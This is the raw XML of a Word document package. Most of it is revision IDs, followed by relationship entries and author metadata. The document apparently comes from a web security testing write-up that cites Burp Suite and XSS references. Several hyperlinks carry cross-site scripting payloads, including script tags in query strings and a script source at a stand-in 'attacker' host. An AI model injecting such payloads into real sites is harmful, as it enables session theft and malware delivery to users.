    <w:rsid w:val="50E14102"/>
    <w:rsid w:val="50E5927D"/>
    <w:rsid w:val="50F0DFD5"/>
    <w:rsid w:val="50F90B27"/>
    <w:rsid w:val="510588D8"/>
    <w:rsid w:val="5109DB23"/>
    <w:rsid w:val="513526B3"/>
    <w:rsid w:val="5139936C"/>
    <w:rsid w:val="514A5761"/>
    <w:rsid w:val="515132CA"/>
    <w:rsid w:val="518019C2"/>
    <w:rsid w:val="518E595D"/>
    <w:rsid w:val="51913BF6"/>
    <w:rsid w:val="519762AC"/>
    <w:rsid w:val="5199894B"/>
    <w:rsid w:val="5199AAF6"/>
    <w:rsid w:val="51A4AD9C"/>
    <w:rsid w:val="51BE75C6"/>
    <w:rsid w:val="51D00CEF"/>
    <w:rsid w:val="51D2766C"/>
    <w:rsid w:val="51FEB679"/>
    <w:rsid w:val="51FF1340"/>
    <w:rsid w:val="522D5E9C"/>
    <w:rsid w:val="5231DE76"/>
    <w:rsid w:val="523F60E1"/>
    <w:rsid w:val="5261E18D"/>
    <w:rsid w:val="5277C671"/>
    <w:rsid w:val="528692AD"/>
    <w:rsid w:val="52A0B09A"/>
    <w:rsid w:val="52AB6070"/>
    <w:rsid w:val="52D563CD"/>
    <w:rsid w:val="52F5A84D"/>
    <w:rsid w:val="5309BBD6"/>
    <w:rsid w:val="531DA357"/>
    <w:rsid w:val="532755A0"/>
    <w:rsid w:val="534C6D6E"/>
    <w:rsid w:val="534E7FD7"/>
    <w:rsid w:val="535E51C9"/>
    <w:rsid w:val="5383943F"/>
    <w:rsid w:val="5386C5FD"/>
    <w:rsid w:val="539B4926"/>
    <w:rsid w:val="54232842"/>
    <w:rsid w:val="542539CC"/>
    <w:rsid w:val="542B15C8"/>
    <w:rsid w:val="542CA7A6"/>
    <w:rsid w:val="54383C04"/>
    <w:rsid w:val="543D98AC"/>
    <w:rsid w:val="5458A7C2"/>
    <w:rsid w:val="547E471A"/>
    <w:rsid w:val="54A2154F"/>
    <w:rsid w:val="54A58C37"/>
    <w:rsid w:val="54CDF1B9"/>
    <w:rsid w:val="54E83DCF"/>
    <w:rsid w:val="5542874A"/>
    <w:rsid w:val="5549791E"/>
    <w:rsid w:val="555A8918"/>
    <w:rsid w:val="5580DA8F"/>
    <w:rsid w:val="558E08F4"/>
    <w:rsid w:val="559BE02F"/>
    <w:rsid w:val="55B29C5E"/>
    <w:rsid w:val="55D10046"/>
    <w:rsid w:val="55E30132"/>
    <w:rsid w:val="55E83C67"/>
    <w:rsid w:val="55EDA040"/>
    <w:rsid w:val="5624829B"/>
    <w:rsid w:val="562D490F"/>
    <w:rsid w:val="5646F94E"/>
    <w:rsid w:val="5659E18E"/>
    <w:rsid w:val="565EF662"/>
    <w:rsid w:val="5669C21A"/>
    <w:rsid w:val="56840E30"/>
    <w:rsid w:val="5691B053"/>
    <w:rsid w:val="56C72D1B"/>
    <w:rsid w:val="571850B5"/>
    <w:rsid w:val="5729D955"/>
    <w:rsid w:val="572A99BF"/>
    <w:rsid w:val="5737B090"/>
    <w:rsid w:val="57511B29"/>
    <w:rsid w:val="57772865"/>
    <w:rsid w:val="5779C6EE"/>
    <w:rsid w:val="57A6780B"/>
    <w:rsid w:val="57BAA0B5"/>
    <w:rsid w:val="57BB2C7C"/>
    <w:rsid w:val="57C91970"/>
    <w:rsid w:val="580A1033"/>
    <w:rsid w:val="581AFC32"/>
    <w:rsid w:val="581E41CD"/>
    <w:rsid w:val="58234E5F"/>
    <w:rsid w:val="584613E3"/>
    <w:rsid w:val="585E9696"/>
    <w:rsid w:val="587197D2"/>
    <w:rsid w:val="589D7916"/>
    <w:rsid w:val="58A31CC9"/>
    <w:rsid w:val="58AD72D5"/>
    <w:rsid w:val="58AF482A"/>
    <w:rsid w:val="58B25E7D"/>
    <w:rsid w:val="58B7B8E8"/>
    <w:rsid w:val="58CFD542"/>
    <w:rsid w:val="58EC06F9"/>
    <w:rsid w:val="591868C0"/>
    <w:rsid w:val="594F1C21"/>
    <w:rsid w:val="594F4DE8"/>
    <w:rsid w:val="596B43D7"/>
    <w:rsid w:val="59743E1C"/>
    <w:rsid w:val="599948DA"/>
    <w:rsid w:val="599C9AE2"/>
    <w:rsid w:val="59A37C7A"/>
    <w:rsid w:val="59D68B97"/>
    <w:rsid w:val="59EBE2CC"/>
    <w:rsid w:val="5A011B39"/>
    <w:rsid w:val="5A35BE2D"/>
    <w:rsid w:val="5A4FF177"/>
    <w:rsid w:val="5A676034"/>
    <w:rsid w:val="5A6FDEF9"/>
    <w:rsid w:val="5A71261A"/>
    <w:rsid w:val="5A850A4C"/>
    <w:rsid w:val="5A933E0A"/>
    <w:rsid w:val="5A972333"/>
    <w:rsid w:val="5A9A574C"/>
    <w:rsid w:val="5AAAEE1B"/>
    <w:rsid w:val="5AADB250"/>
    <w:rsid w:val="5AB27596"/>
    <w:rsid w:val="5ADE18CD"/>
    <w:rsid w:val="5ADED4F6"/>
    <w:rsid w:val="5B00BA32"/>
    <w:rsid w:val="5B204D35"/>
    <w:rsid w:val="5B23CE72"/>
    <w:rsid w:val="5B52DA5D"/>
    <w:rsid w:val="5B6C04EA"/>
    <w:rsid w:val="5B6DC168"/>
    <w:rsid w:val="5BA07A12"/>
    <w:rsid w:val="5BAA4607"/>
    <w:rsid w:val="5C3627AD"/>
    <w:rsid w:val="5C477231"/>
    <w:rsid w:val="5C79E92E"/>
    <w:rsid w:val="5C86EEAA"/>
    <w:rsid w:val="5C8C19A0"/>
    <w:rsid w:val="5C9542B4"/>
    <w:rsid w:val="5C9C8A93"/>
    <w:rsid w:val="5CCBDD08"/>
    <w:rsid w:val="5CCED488"/>
    <w:rsid w:val="5CD7DBF0"/>
    <w:rsid w:val="5CDAEB25"/>
    <w:rsid w:val="5D17E4CA"/>
    <w:rsid w:val="5D1F7C4F"/>
    <w:rsid w:val="5D49130E"/>
    <w:rsid w:val="5D5199FF"/>
    <w:rsid w:val="5D569904"/>
    <w:rsid w:val="5D80B462"/>
    <w:rsid w:val="5D8F3796"/>
    <w:rsid w:val="5D994DDB"/>
    <w:rsid w:val="5D9E009C"/>
    <w:rsid w:val="5DAC417F"/>
    <w:rsid w:val="5DB89207"/>
    <w:rsid w:val="5DC7B190"/>
    <w:rsid w:val="5DC96C92"/>
    <w:rsid w:val="5DDA25EF"/>
    <w:rsid w:val="5DDF89C8"/>
    <w:rsid w:val="5E18F8DF"/>
    <w:rsid w:val="5E385AF4"/>
    <w:rsid w:val="5E59B7DD"/>
    <w:rsid w:val="5E891544"/>
    <w:rsid w:val="5EBD0847"/>
    <w:rsid w:val="5EC10459"/>
    <w:rsid w:val="5ED88A71"/>
    <w:rsid w:val="5EDF07CE"/>
    <w:rsid w:val="5EF382A8"/>
    <w:rsid w:val="5F349586"/>
    <w:rsid w:val="5F4304B1"/>
    <w:rsid w:val="5F492601"/>
    <w:rsid w:val="5F900A19"/>
    <w:rsid w:val="5FB94906"/>
    <w:rsid w:val="5FBEF15E"/>
    <w:rsid w:val="5FC17159"/>
    <w:rsid w:val="5FCB1892"/>
    <w:rsid w:val="5FF31B22"/>
    <w:rsid w:val="60289752"/>
    <w:rsid w:val="604F858C"/>
    <w:rsid w:val="60660BD4"/>
    <w:rsid w:val="607DB72A"/>
    <w:rsid w:val="60947C49"/>
    <w:rsid w:val="60A24FD8"/>
    <w:rsid w:val="60B15B82"/>
    <w:rsid w:val="6108D39C"/>
    <w:rsid w:val="6141FF9D"/>
    <w:rsid w:val="61579AD9"/>
    <w:rsid w:val="616AB43C"/>
    <w:rsid w:val="6191589F"/>
    <w:rsid w:val="61A826B4"/>
    <w:rsid w:val="61C0B606"/>
    <w:rsid w:val="61C355C5"/>
    <w:rsid w:val="61E43366"/>
    <w:rsid w:val="61EA6C11"/>
    <w:rsid w:val="622DA3D5"/>
    <w:rsid w:val="62848BE2"/>
    <w:rsid w:val="628FF108"/>
    <w:rsid w:val="6297CFB8"/>
    <w:rsid w:val="62E92AB2"/>
    <w:rsid w:val="630ADBE0"/>
    <w:rsid w:val="6324CF2D"/>
    <w:rsid w:val="634A3525"/>
    <w:rsid w:val="634A3F22"/>
    <w:rsid w:val="63603814"/>
    <w:rsid w:val="636BC528"/>
    <w:rsid w:val="637825EE"/>
    <w:rsid w:val="637F32CE"/>
    <w:rsid w:val="638EA5C1"/>
    <w:rsid w:val="639520D0"/>
    <w:rsid w:val="63B7B94A"/>
    <w:rsid w:val="63C1338B"/>
    <w:rsid w:val="63E406E3"/>
    <w:rsid w:val="63FC7766"/>
    <w:rsid w:val="6407B485"/>
    <w:rsid w:val="64496773"/>
    <w:rsid w:val="645C08F6"/>
    <w:rsid w:val="64654221"/>
    <w:rsid w:val="648082FC"/>
    <w:rsid w:val="649A1553"/>
    <w:rsid w:val="649D0E0E"/>
    <w:rsid w:val="64D14074"/>
    <w:rsid w:val="64D949CB"/>
    <w:rsid w:val="64DD3B42"/>
    <w:rsid w:val="64F27228"/>
    <w:rsid w:val="64FAF687"/>
    <w:rsid w:val="65363811"/>
    <w:rsid w:val="654222C1"/>
    <w:rsid w:val="65462991"/>
    <w:rsid w:val="655CA7F9"/>
    <w:rsid w:val="656A6C0C"/>
    <w:rsid w:val="659EEBDF"/>
    <w:rsid w:val="65A384E6"/>
    <w:rsid w:val="65AA49FA"/>
    <w:rsid w:val="65B20EB5"/>
    <w:rsid w:val="65B24635"/>
    <w:rsid w:val="66011282"/>
    <w:rsid w:val="660BACA5"/>
    <w:rsid w:val="661CBD57"/>
    <w:rsid w:val="66622F30"/>
    <w:rsid w:val="6676E08B"/>
    <w:rsid w:val="66790BA3"/>
    <w:rsid w:val="66A3FE19"/>
    <w:rsid w:val="66A6F549"/>
    <w:rsid w:val="66AEF1CF"/>
    <w:rsid w:val="66AFC6B0"/>
    <w:rsid w:val="66B2545E"/>
    <w:rsid w:val="66B7A489"/>
    <w:rsid w:val="66DD50E5"/>
    <w:rsid w:val="66FF78A2"/>
    <w:rsid w:val="6708E63C"/>
    <w:rsid w:val="6726A641"/>
    <w:rsid w:val="673F5547"/>
    <w:rsid w:val="67431C7C"/>
    <w:rsid w:val="674CE73D"/>
    <w:rsid w:val="6764C6CB"/>
    <w:rsid w:val="67704ABE"/>
    <w:rsid w:val="6782E6F7"/>
    <w:rsid w:val="67A47B66"/>
    <w:rsid w:val="67A7C31B"/>
    <w:rsid w:val="67CD76D2"/>
    <w:rsid w:val="67D3A727"/>
    <w:rsid w:val="67D3E060"/>
    <w:rsid w:val="67D5D0C5"/>
    <w:rsid w:val="680B42FB"/>
    <w:rsid w:val="681A0A50"/>
    <w:rsid w:val="68224683"/>
    <w:rsid w:val="6825C5D8"/>
    <w:rsid w:val="68382F7E"/>
    <w:rsid w:val="688F44CB"/>
    <w:rsid w:val="68BA3435"/>
    <w:rsid w:val="68FB10FB"/>
    <w:rsid w:val="68FF5700"/>
    <w:rsid w:val="690904E4"/>
    <w:rsid w:val="691B6C1E"/>
    <w:rsid w:val="69282412"/>
    <w:rsid w:val="6943937C"/>
    <w:rsid w:val="6962B6A1"/>
    <w:rsid w:val="69669077"/>
    <w:rsid w:val="696EC6C8"/>
    <w:rsid w:val="699F3435"/>
    <w:rsid w:val="69B160E5"/>
    <w:rsid w:val="69BBEDDA"/>
    <w:rsid w:val="69C3CF65"/>
    <w:rsid w:val="69C65D7E"/>
    <w:rsid w:val="69D8A295"/>
    <w:rsid w:val="69E45181"/>
    <w:rsid w:val="69EF454B"/>
    <w:rsid w:val="69FF4E4E"/>
    <w:rsid w:val="6A00F97B"/>
    <w:rsid w:val="6A015E99"/>
    <w:rsid w:val="6A04263C"/>
    <w:rsid w:val="6A0EA128"/>
    <w:rsid w:val="6A15FF62"/>
    <w:rsid w:val="6A208BF2"/>
    <w:rsid w:val="6A2B152C"/>
    <w:rsid w:val="6A2E416D"/>
    <w:rsid w:val="6A5179ED"/>
    <w:rsid w:val="6A661541"/>
    <w:rsid w:val="6A69BBBA"/>
    <w:rsid w:val="6A6E02C7"/>
    <w:rsid w:val="6A6EA6B1"/>
    <w:rsid w:val="6A7DBB1D"/>
    <w:rsid w:val="6A7EE4E9"/>
    <w:rsid w:val="6A83832B"/>
    <w:rsid w:val="6AA7EB80"/>
    <w:rsid w:val="6AEF674F"/>
    <w:rsid w:val="6B316514"/>
    <w:rsid w:val="6B33E621"/>
    <w:rsid w:val="6B51D99E"/>
    <w:rsid w:val="6B57BE3B"/>
    <w:rsid w:val="6B61B3AC"/>
    <w:rsid w:val="6B8337D3"/>
    <w:rsid w:val="6B85139D"/>
    <w:rsid w:val="6B8D6A3B"/>
    <w:rsid w:val="6BBC5C53"/>
    <w:rsid w:val="6BC6E58D"/>
    <w:rsid w:val="6BDA4A0D"/>
    <w:rsid w:val="6BE3BF97"/>
    <w:rsid w:val="6BF50506"/>
    <w:rsid w:val="6C309A66"/>
    <w:rsid w:val="6C41E645"/>
    <w:rsid w:val="6C4BDB3D"/>
    <w:rsid w:val="6C5452B7"/>
    <w:rsid w:val="6C9A871E"/>
    <w:rsid w:val="6CB66CA7"/>
    <w:rsid w:val="6CB79436"/>
    <w:rsid w:val="6CC43974"/>
    <w:rsid w:val="6CEBA62B"/>
    <w:rsid w:val="6CF5B7A6"/>
    <w:rsid w:val="6CFDCE13"/>
    <w:rsid w:val="6D1F9475"/>
    <w:rsid w:val="6D209FAC"/>
    <w:rsid w:val="6D21552B"/>
    <w:rsid w:val="6D2F4B7F"/>
    <w:rsid w:val="6D47D513"/>
    <w:rsid w:val="6D55222C"/>
    <w:rsid w:val="6D76CBEC"/>
    <w:rsid w:val="6D84A3D1"/>
    <w:rsid w:val="6D860427"/>
    <w:rsid w:val="6D90D567"/>
    <w:rsid w:val="6D916AE3"/>
    <w:rsid w:val="6DA5A389"/>
    <w:rsid w:val="6DD72F55"/>
    <w:rsid w:val="6DDF8C42"/>
    <w:rsid w:val="6E4CF241"/>
    <w:rsid w:val="6E4D4FFF"/>
    <w:rsid w:val="6E631A0F"/>
    <w:rsid w:val="6E7FF3E4"/>
    <w:rsid w:val="6E8E6219"/>
    <w:rsid w:val="6E971E3B"/>
    <w:rsid w:val="6ED78F93"/>
    <w:rsid w:val="6EF0F28D"/>
    <w:rsid w:val="6F0237FC"/>
    <w:rsid w:val="6F0677EF"/>
    <w:rsid w:val="6F2AF3FC"/>
    <w:rsid w:val="6F5D98B8"/>
    <w:rsid w:val="6F6E14EA"/>
    <w:rsid w:val="6F982A7D"/>
    <w:rsid w:val="6F9B2BCD"/>
    <w:rsid w:val="6FCEBA2D"/>
    <w:rsid w:val="6FD84391"/>
    <w:rsid w:val="6FE8C2A2"/>
    <w:rsid w:val="700A46C2"/>
    <w:rsid w:val="700D53F0"/>
    <w:rsid w:val="7013D642"/>
    <w:rsid w:val="7048B660"/>
    <w:rsid w:val="70604435"/>
    <w:rsid w:val="70B41AFD"/>
    <w:rsid w:val="70DC361E"/>
    <w:rsid w:val="70DFDD87"/>
    <w:rsid w:val="70EAE0B5"/>
    <w:rsid w:val="70F568CE"/>
    <w:rsid w:val="70FD7764"/>
    <w:rsid w:val="710C8D00"/>
    <w:rsid w:val="711709E0"/>
    <w:rsid w:val="7133E9B4"/>
    <w:rsid w:val="71474A14"/>
    <w:rsid w:val="714EA561"/>
    <w:rsid w:val="715ECDC1"/>
    <w:rsid w:val="71645E02"/>
    <w:rsid w:val="717D2726"/>
    <w:rsid w:val="71A35F97"/>
    <w:rsid w:val="71ABD5BB"/>
    <w:rsid w:val="71C16320"/>
    <w:rsid w:val="71C43B7C"/>
    <w:rsid w:val="71E8BBCF"/>
    <w:rsid w:val="71F1A476"/>
    <w:rsid w:val="721865AA"/>
    <w:rsid w:val="7228934F"/>
    <w:rsid w:val="729C6F9B"/>
    <w:rsid w:val="72A5A09F"/>
    <w:rsid w:val="72F6BEE6"/>
    <w:rsid w:val="731BA130"/>
    <w:rsid w:val="732E6C4C"/>
    <w:rsid w:val="734D7328"/>
    <w:rsid w:val="7358C2EC"/>
    <w:rsid w:val="736948DA"/>
    <w:rsid w:val="73840095"/>
    <w:rsid w:val="738D74D7"/>
    <w:rsid w:val="7395EC82"/>
    <w:rsid w:val="73D9281D"/>
    <w:rsid w:val="73D92F94"/>
    <w:rsid w:val="73DF1B3E"/>
    <w:rsid w:val="73F91727"/>
    <w:rsid w:val="7414E50D"/>
    <w:rsid w:val="741A5952"/>
    <w:rsid w:val="743E0C75"/>
    <w:rsid w:val="7443FDB4"/>
    <w:rsid w:val="74444B07"/>
    <w:rsid w:val="7456ED22"/>
    <w:rsid w:val="7482FA94"/>
    <w:rsid w:val="7486FAEE"/>
    <w:rsid w:val="74928F47"/>
    <w:rsid w:val="74996CB8"/>
    <w:rsid w:val="74A22B50"/>
    <w:rsid w:val="74B0391D"/>
    <w:rsid w:val="74B44A20"/>
    <w:rsid w:val="74B4C7E8"/>
    <w:rsid w:val="74E5DD10"/>
    <w:rsid w:val="74E70AB1"/>
    <w:rsid w:val="74E7921D"/>
    <w:rsid w:val="75202F44"/>
    <w:rsid w:val="752A1A19"/>
    <w:rsid w:val="752C1841"/>
    <w:rsid w:val="753132BE"/>
    <w:rsid w:val="753C1C25"/>
    <w:rsid w:val="75481D59"/>
    <w:rsid w:val="75717980"/>
    <w:rsid w:val="757A8EBF"/>
    <w:rsid w:val="758633F8"/>
    <w:rsid w:val="759B27F7"/>
    <w:rsid w:val="75D5F79C"/>
    <w:rsid w:val="75D678D5"/>
    <w:rsid w:val="75E33088"/>
    <w:rsid w:val="75EA7B03"/>
    <w:rsid w:val="75F26889"/>
    <w:rsid w:val="75FC18EC"/>
    <w:rsid w:val="76009CBF"/>
    <w:rsid w:val="761DC6E1"/>
    <w:rsid w:val="76247B8B"/>
    <w:rsid w:val="76865328"/>
    <w:rsid w:val="76923696"/>
    <w:rsid w:val="76984ABB"/>
    <w:rsid w:val="76A113AA"/>
    <w:rsid w:val="76C02EDA"/>
    <w:rsid w:val="76D30FB8"/>
    <w:rsid w:val="76D3EF71"/>
    <w:rsid w:val="76E251EA"/>
    <w:rsid w:val="76F486B5"/>
    <w:rsid w:val="77026B36"/>
    <w:rsid w:val="770B051D"/>
    <w:rsid w:val="771DAC3F"/>
    <w:rsid w:val="7741D94D"/>
    <w:rsid w:val="777BCE84"/>
    <w:rsid w:val="77862B74"/>
    <w:rsid w:val="778E38EA"/>
    <w:rsid w:val="77B99742"/>
    <w:rsid w:val="77C36FDC"/>
    <w:rsid w:val="77CA3009"/>
    <w:rsid w:val="77CFCCBA"/>
    <w:rsid w:val="77E044DE"/>
    <w:rsid w:val="77E59905"/>
    <w:rsid w:val="77EC68AA"/>
    <w:rsid w:val="781EE025"/>
    <w:rsid w:val="78404E81"/>
    <w:rsid w:val="784E08DA"/>
    <w:rsid w:val="78538C5C"/>
    <w:rsid w:val="7873C577"/>
    <w:rsid w:val="787A514C"/>
    <w:rsid w:val="788A95D4"/>
    <w:rsid w:val="78907EC8"/>
    <w:rsid w:val="789D2B8E"/>
    <w:rsid w:val="789DE5C6"/>
    <w:rsid w:val="78ABE94C"/>
    <w:rsid w:val="78D97A7B"/>
    <w:rsid w:val="78E9AC46"/>
    <w:rsid w:val="78FE69A9"/>
    <w:rsid w:val="791CEC75"/>
    <w:rsid w:val="79408EE9"/>
    <w:rsid w:val="795567A3"/>
    <w:rsid w:val="7966006A"/>
    <w:rsid w:val="7969DFA6"/>
    <w:rsid w:val="797C980D"/>
    <w:rsid w:val="79850B06"/>
    <w:rsid w:val="798B9269"/>
    <w:rsid w:val="79A04E0F"/>
    <w:rsid w:val="79B1A3D2"/>
    <w:rsid w:val="79B8A0D3"/>
    <w:rsid w:val="79BA7BD4"/>
    <w:rsid w:val="79C93E25"/>
    <w:rsid w:val="79DAA557"/>
    <w:rsid w:val="79E5D0ED"/>
    <w:rsid w:val="79E9D93B"/>
    <w:rsid w:val="79F2397B"/>
    <w:rsid w:val="79FD8B3C"/>
    <w:rsid w:val="7A17D5B6"/>
    <w:rsid w:val="7A2B4E4B"/>
    <w:rsid w:val="7A39B627"/>
    <w:rsid w:val="7A3FE2A2"/>
    <w:rsid w:val="7A6C103C"/>
    <w:rsid w:val="7A842691"/>
    <w:rsid w:val="7A955674"/>
    <w:rsid w:val="7AB97A5D"/>
    <w:rsid w:val="7ABBABF7"/>
    <w:rsid w:val="7AC76D79"/>
    <w:rsid w:val="7ADC5F4A"/>
    <w:rsid w:val="7AF7230B"/>
    <w:rsid w:val="7B00AD24"/>
    <w:rsid w:val="7B01A573"/>
    <w:rsid w:val="7B01D0CB"/>
    <w:rsid w:val="7B1557D0"/>
    <w:rsid w:val="7B204E5D"/>
    <w:rsid w:val="7B29DC4C"/>
    <w:rsid w:val="7B2B1B3A"/>
    <w:rsid w:val="7B34F94E"/>
    <w:rsid w:val="7B564C35"/>
    <w:rsid w:val="7B995B9D"/>
    <w:rsid w:val="7BA13976"/>
    <w:rsid w:val="7BA6562D"/>
    <w:rsid w:val="7BAE6DA0"/>
    <w:rsid w:val="7BDE2222"/>
    <w:rsid w:val="7BE4F6DD"/>
    <w:rsid w:val="7BEBB2C1"/>
    <w:rsid w:val="7C1E9735"/>
    <w:rsid w:val="7C26C937"/>
    <w:rsid w:val="7C2FE146"/>
    <w:rsid w:val="7C3723F8"/>
    <w:rsid w:val="7C45F8CD"/>
    <w:rsid w:val="7C5FB892"/>
    <w:rsid w:val="7C7FB6E7"/>
    <w:rsid w:val="7C857679"/>
    <w:rsid w:val="7C9D75D4"/>
    <w:rsid w:val="7CC6EB9B"/>
    <w:rsid w:val="7CCF3DE2"/>
    <w:rsid w:val="7CE1E31D"/>
    <w:rsid w:val="7CF8DB80"/>
    <w:rsid w:val="7D119FEC"/>
    <w:rsid w:val="7D254285"/>
    <w:rsid w:val="7D352BFE"/>
    <w:rsid w:val="7D3A9049"/>
    <w:rsid w:val="7D3D09D7"/>
    <w:rsid w:val="7D4C8DE8"/>
    <w:rsid w:val="7D62EF0D"/>
    <w:rsid w:val="7D989A31"/>
    <w:rsid w:val="7DB2A127"/>
    <w:rsid w:val="7E0676C2"/>
    <w:rsid w:val="7E2BAC99"/>
    <w:rsid w:val="7E3CC4FD"/>
    <w:rsid w:val="7E4315C4"/>
    <w:rsid w:val="7E651DA7"/>
    <w:rsid w:val="7E661F6E"/>
    <w:rsid w:val="7E6F3BE9"/>
    <w:rsid w:val="7E798BFD"/>
    <w:rsid w:val="7E8CE545"/>
    <w:rsid w:val="7EB94B4F"/>
    <w:rsid w:val="7EB95CD4"/>
    <w:rsid w:val="7EBEDD4A"/>
    <w:rsid w:val="7ED660AA"/>
    <w:rsid w:val="7ED7DDC9"/>
    <w:rsid w:val="7ED8DA38"/>
    <w:rsid w:val="7EDB9847"/>
    <w:rsid w:val="7EF880FE"/>
    <w:rsid w:val="7EFD24D3"/>
    <w:rsid w:val="7F2AD025"/>
    <w:rsid w:val="7F318EBB"/>
    <w:rsid w:val="7F43601D"/>
    <w:rsid w:val="7F802272"/>
    <w:rsid w:val="7F8A12CE"/>
    <w:rsid w:val="7F9A3E1B"/>
    <w:rsid w:val="7FB1B1BD"/>
    <w:rsid w:val="7FBCC115"/>
    <w:rsid w:val="7FD5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E6F7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F9E84D0E-FD2C-47C9-9379-74FD492B4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9e90e3513474918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://everything-shop.net/search?term=item" TargetMode="External" Id="Rcc8689fc0cc14c6b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://everything-shop.net/search?term=&lt;script&gt;/*+MaliciousCodeThatDoomsTheApp+*/&lt;/script" TargetMode="External" Id="Ra7f13fe817e74431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/index.php?user=&lt;script&gt;window.onload" TargetMode="External" Id="R801b7316e3914d18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://badexample.com/malicious.exe;}&lt;/script" TargetMode="External" Id="Rd36cd2f0e216490d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker/xss.js&#8221;&gt;&lt;/script" TargetMode="External" Id="Rddab074078f8484e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example/?var=&lt;SCRIPT%20a=&#8221;&gt;&#8221;%20SRC=&#8221;https://attacker/xss.js&#8221;&gt;&lt;/SCRIPT" TargetMode="External" Id="R1d6989017e084ee7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/index.php?user&lt;script&gt;alert(123)&lt;/script" TargetMode="External" Id="R84e07ea2da51428f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="R06aa84c172dd4084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="R2a17c843c4174b21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="Ra40ca629325d444c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="R6f10848704c84014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R75bda69665c741b9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="Rae34ceb39ca744d6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="Ra824eea3f5d7483a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="R1927654a92944d6d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="Rab9a38512920494f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="Rd8f78d3cc45b4705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="Rc739b8148239433c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="R53a6f2d7a5274475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="Rf00088de71624765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="R2585cb4374124b03" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="R1ca72124bff04537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="Rd98e6ce8f5924d67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="Rc5c9526582fb4665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="Rd54fcc04c9974e7e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="R0fee2c9431794b5e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image14.png" Id="R8176c0a9549a46a3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image15.png" Id="R44214cc072a04ef2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="Rad8c6d196c1f43eb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image17.png" Id="R52aef62a601b46ba" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oreilly.com/library/view/burp-suite-cookbook/9781789531732/a2635912-e2fb-4ad1-848e-75340e5be2cb.xhtml" TargetMode="External" Id="Rb9e93f1b5f944938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.geeksforgeeks.org/data-integrity-testing-in-software-testing/" TargetMode="External" Id="Rf6736b44755640e5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.geeksforgeeks.org/how-to-use-preparedstatement-in-java/" TargetMode="External" Id="Rb606ddca3b0d4d9e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/stored-xss/" TargetMode="External" Id="Re7b13e959ec1490f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.geeksforgeeks.org/understanding-stored-xss-in-depth/" TargetMode="External" Id="R183afc9c9cda4f82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/reflected" TargetMode="External" Id="Raf23b4e7e09343fe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header.xml" Id="R8fbeb16025814aa5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer.xml" Id="Ra6c360f8444b4527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R547ea926be2a45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2024-05-04T17:24:42.9221516Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-08T03:41:47.1856999Z</dcterms:modified>
  <dc:creator>Mark Kardash</dc:creator>
  <lastModifiedBy>Mark Kardash</lastModifiedBy>
</coreProperties>
</file>